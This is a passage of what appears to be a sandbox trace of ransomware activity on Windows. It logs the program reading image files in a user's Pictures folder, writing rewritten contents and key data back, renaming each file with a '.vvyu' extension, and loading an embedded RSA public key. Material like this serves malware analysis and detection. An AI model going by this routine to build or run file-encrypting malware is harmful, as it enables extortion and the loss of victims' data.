(hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.797] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.797] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.797] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x117d0) returned 0x2d49778 [0193.797] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42148 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42190 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.798] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f58 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.801] GetCurrentThreadId () returned 0x264 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45ee0 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.801] GetCurrentThreadId () returned 0x264 [0193.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f70 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42190 | out: hHeap=0x6a0000) returned 1 [0193.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.824] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x117ce, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x117ce, lpOverlapped=0x0) returned 1 [0193.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.825] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x117d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.825] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.826] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.827] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.827] CloseHandle (hObject=0x584) returned 1 [0193.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0193.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d49778 [0193.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0193.830] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\-2oKT.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\-2okt.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\-2oKT.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\-2okt.gif.vvyu")) returned 1 [0193.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.833] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.836] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb47c9bc0, ftCreationTime.dwHighDateTime=0x1d89c33, ftLastAccessTime.dwLowDateTime=0xf2dd05e0, ftLastAccessTime.dwHighDateTime=0x1d89eda, ftLastWriteTime.dwLowDateTime=0xf2dd05e0, ftLastWriteTime.dwHighDateTime=0x1d89eda, nFileSizeHigh=0x0, nFileSizeLow=0x163f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CfqSEGHWv8Id7U6qj5.gif", cAlternateFileName="CFQSEG~1.GIF")) returned 1 [0193.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.836] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\CfqSEGHWv8Id7U6qj5.gif") returned=".gif" [0193.836] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\CfqSEGHWv8Id7U6qj5.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\cfqseghwv8id7u6qj5.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.841] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=91121) returned 1 [0193.841] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.843] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x163cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.843] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.846] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.846] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x163f1, lpOverlapped=0x0) returned 1 [0193.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.847] lstrlenA (lpString="-----BEGIN PUBLIC 